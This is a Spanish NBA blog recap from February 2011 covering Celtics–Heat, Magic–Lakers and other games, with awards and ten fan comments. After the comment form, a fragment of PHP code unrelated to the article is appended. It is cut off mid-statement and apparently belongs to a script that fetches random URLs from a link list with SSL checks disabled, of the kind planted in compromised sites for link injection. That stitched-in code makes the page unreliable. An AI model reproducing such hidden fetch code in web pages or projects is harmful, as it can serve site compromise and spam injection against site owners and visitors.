La Crónica (13/02/2011)

14 de February de 2011 por txusma

Día de muchos titulares. Podríamos empezar destacando la victoria de los Celtics sobre los Heat (82-85) de la mano de un Rajon Rondo espectacular. ¿Qué sería de este chico si aprendiera a tirar de fuera? Anoche los Heat le flotaron descaradamente, incluso a falta de 20 segundos donde le dejaron completamente sólo a 5 metros de la canasta y Rondo no fue capaz de anotar. Desde aquí le animamos a que se pase el verano al lado de un entrenador. Si mejora esa faceta de su juego, se convertiría en el mejor base de la liga, de largo.

La victoria verde suposo la tercera de la temporada sobre unos Heat a los que puede empezar a pasarles factura psicológica tanta derrota. Anoche estuvieron muy cerquita de llevarse el partido con una buena remontada en el último cuarto pero no deberían lanzar las campanas al vuelo. Paul Pierce cuajó posiblemente el peor partido de su carrera fallando los 10 tiros que intentó y ni con esas, Lebron y compañía pudieron celebrar la victoria. El 10 de Abril, nuevo capítulo en esta rivalidad.

Otro titular: “Los Magic pasan por encima de los Lakers” o mejor dicho “Dwight Howard pasa por encima de los Lakers”, Pau Gasol incluído (75-89). En otras ocasiones el catalán ha ofrecido masters en defensa al enfrentarse al pívot de Orlando pero ayer, él y Bynum, se vieron completamente superados. ¿Síntoma de los males amarillos? Derrota angelina ante un equipo en el que, Howard aparte, tampoco nadie aportó en demasía.

Titular aunque con menos glamour: “Los Wizards logran la primera victoria fuera de casa en 10 meses”. 10 meses es muchísimo tiempo, ojo. Como no podía ser de otra forma, el rival fueron los Cavs (115-100). Con una primera parte parte excelsa, el partido quedó resuelto permitiendo lucirse a los jugadores capitulinos. Sin duda, los Cavs son el equipo más solidario de la liga. Todos curan sus males.

¿Más titulares? “Sorprendente derrota de los Thunder en casa de los Warriors (94-100)”. Venimos avisando de qué en muchas ocasiones Durant y Westbrook se quedan muy solos ante el peligro. Su inmensa calidad les permite sacar muchos partidos adelante pero anoche tuvieron que hincar la rodilla ante Ellis, Curry y Lee. Oklahoma perdió 20 balones, otorgando demasiadas oportunidades a Golden State.

Y un titular más incluso: “Los Kings se imponen a los Suns sin Demarcus Cousins (113-108)”. ¿Y qué le ha pasado al segundo/tercer mejor rookie de la temporada? Pues que parece ser que tras el partido frente los Thunder tuvo un enfrentamiento en el vestuario con Donte Greene al que recriminó que no le pasara el balón en la última posesión. Dos ideas rápidas: 1.- Cousins hace buenos números día sí y día también pero el día que falta, los Kings ganan. 2.- Cousins no sería el primer gran jugador que se pierde por su mala cabeza.

Finiquitando por la vía rápida esta crónica hemos de decir que Lamarcus Aldridge volvió a hacer milagros al liderar a los Blazers a la victoria frente los Pistons (105-100), que Toronto le ganó a los Clippers, 93-98, que están sufriendo la baja de Eric Gordon, y que Memphis se impuso a los Nuggets tras remontarles 17 puntos (108-116).

PREMIOS

MVP: Rajon Rondo se cascó un triple doble, pero los 31 puntos (13-16), 13 rebotes y 3 tapones de Dwight Howard pesan aún más.

Rookie: John Wall se impone por la mínima a Blake Griffin en su duelo particular. El primero se fue a los 19 puntos, 5 rebotes y 14 asistencias y el segundo se quedó en 21 puntos y 15 rebotes.

Sorpresa: Anoche, el mejor de los Grizzlies fue Darrell Arthur. Saliendo desde el banco anotó 24 puntos y capturó 6 rebotes.

Decepción: A pesar de los que Celtics se llevaran finalmente la victoria el 0 de 10 de Paul Pierce es impropio para un jugador de su calidad. Al menos, tuvo la decencia de no obcecarse aún más en tirar (¿alguien olvida el 3 de 23 de Kenyon Martin en unas finales?)

Esfuerzo en vano: Steve Nash y los suyos se vieron superados por los Kings a pesar de sus 22 puntos y 18 asistencias. Si un traspaso no lo remedia, este hombre se nos va a quedar sin anillo.

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Nash es una jodida leyenda viviente, es nauseabundo que tenga que quedarse sin anillo. Se me ocurren miles de plantillas que mejorarían con el canadiense en sus filas, aún renunciando a jugadores: los Heat renunciando a una de sus super-estrellas? Los Magic en vez de Arenas? Bueno, no son miles pero sirven.
    La verdad es que aprovecho para decir que la conferencia Este y la diferencia de victorias resulta lamentable, a estas alturas de la temporada tengo la certeza de que los equipos como Portland o Memphis tendrían plaza de PO asegurada en la otra conferencia.
    Son obviedades, ya lo sé, pero me he levantado con el pie baloncestìstico izquierdo

      Citar

  2. Denise dice:
    #2

    ¿Donde hay que firmar para tradear a Nash por Arenas?

      Citar

  3. Scriers dice:
    #3

    Un cambio nash arenas no se lo cree nadie. Sería Orlando el equipazo. os imaginais a redick-anderson por fuera recibiendo pases y a Howard por dentro? Brutal.
    Por cierto los lakers desde la crisis Cisne negro han conseguido un sobreesfuerzo de Gasol y Odom pero minima implicaciön del resto. Hace falta mäs. mucho más para ganar el tercero.

      Citar

  4. HisRoyalAirness dice:
    #4

    Yo con los Lakers me dejo llevar. Si Barnes vuelve bien estân en todas las quinielas, siempre se rascan los huevos una temporada y después ganan cuando les parece. De todas maneras yo intentaría buscar otro guard potable porque contra Celtics el bueno de Derek ya no puede cubrir a nadie (Deer no me mates, lo digo de corazón y sabiendo lo que supone en el vestuario de LA). No sé si os fijasteis el otro dIa que hasta que batió el record cubrió él a Sugar Ray y después se lo pasó a Kobe. Parecía que Phil quería dejar que lo superase.
    A los hombres grandes los veo muy por encima de cualquier otro equipo aunque miedo me da en una posible final los dos O’neal, KG y Perkins repartiendo cera bajo canasta. Son los ùnicos a los que le daría posibilidades.

      Citar

  5. Marcaco dice:
    #5

    Fisher + playoffs > all

      Citar

  6. Sempren dice:
    #6

    HisRoyalAirness, te olvidas de Big Baby, y al final suele acabar haciéndole destrozos a Lakers cargando el rebote ofensivo, y sacando petróleo del aire.

      Citar

  7. Sancho88 dice:
    #7

    Es la historia de todos los años, pero Lakers siguen siendo muy favoritos al anillo. A ver, con Bryant, Pau y Odom al 100% prácticamente ya se meriendan a cualquiera. Si a esos les pones al hipermotivadísimo Fisher en los Playoffs, a Artest, que el cabrón también tiene talento de sobra y cuando se combina con Odom en defensa no hay ni dios que entre en la zona con garantías, y a Bynum… (otro sustito ayer con sus rodillas)… que digamos, ya es imposible confiar en él, pero por lo menos para darle 10 minutos de descanso a Pau… pues que queréis que os diga, tampoco tiene nada que envidiarles a Perkins y Davis, más luchadores e impetuosos pero con menos talento… Lakers son mucho Lakers.
    Ayer Howard demostró que es la bestia parda de la liga y estuvo arropado por Turkoglu y la intensidad defensiva de Brandon Bass (este chico le echa dos pelotas al asunto, tiene mucho futuro). Nelson es un base muy completo y el jugador que le gusta a Denise, Clark. Eh, muy bueno el pavo, unas espaldas de la hostia y un físico increíble, que unidos a su juventud y ganas hacen de él un señor Marcin Gortat en toda regla (se van reposicionando algunos roles que creíamos perdidos desde la marcha de Gortat o Pietrus, porque Bass y Turkoglu también pueden defender de putísima madre como hacía Pietrus, de hecho ayer Turkoglu se pegó como una lapa a Kobe recordando aquellas noches memorables de 2009… que increíble final joder, un basket de puta madre).
    Lo único que pasa es que el rodillo de L.A. desapareció en el primer anillo de esta serie llamada ‘Threepeat’ 2.0 (2001-2003 vs. 2009-2011). El año pasado ya se dejaban llevar, como dice HisRoyalAirness, y este año hay partidos que es una tocada de pelotas en toda regla. En fin, a partidos puntuales cualquiera es peligroso, pero yo, hasta que no lleguen las noches mágicas de finales de mayo y principios de junio, con ese olor especial en el aire que avisa del verano, y estos perezosos la caguen (hipotéticamente)… para mí no tienen rival en toda la liga

      Citar

  8. Sancho88 dice:
    #8

    a 7 partidos, digo, jeje, muy importante aclaración a toda la parrafada.

      Citar

  9. MagicJohnson32 dice:
    #9

    A mí me parecieron cansados los Lakers, veremos hoy (por cierto, Kobe es duda).

    @Sempren: tendemos a exagerar las actuaciones de Big Baby vs Lakers. Empezó bien las Finales, especialmente los partidos 3 y 4, cuando fue determinante, pero desapareció en los 3 últimos. Quitando esos dos partidos, promedió 3 puntos en las Finales.

    PD: Parece que Kobe jugará, aunque enfermo.

      Citar

  10. Sancho88 dice:
    #10

    joder, me estan poniendo de los nervios que mierda de partido estan haciendo los lakers. que me van a joder una combinada con portland y san antonio. estan echos mierda

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>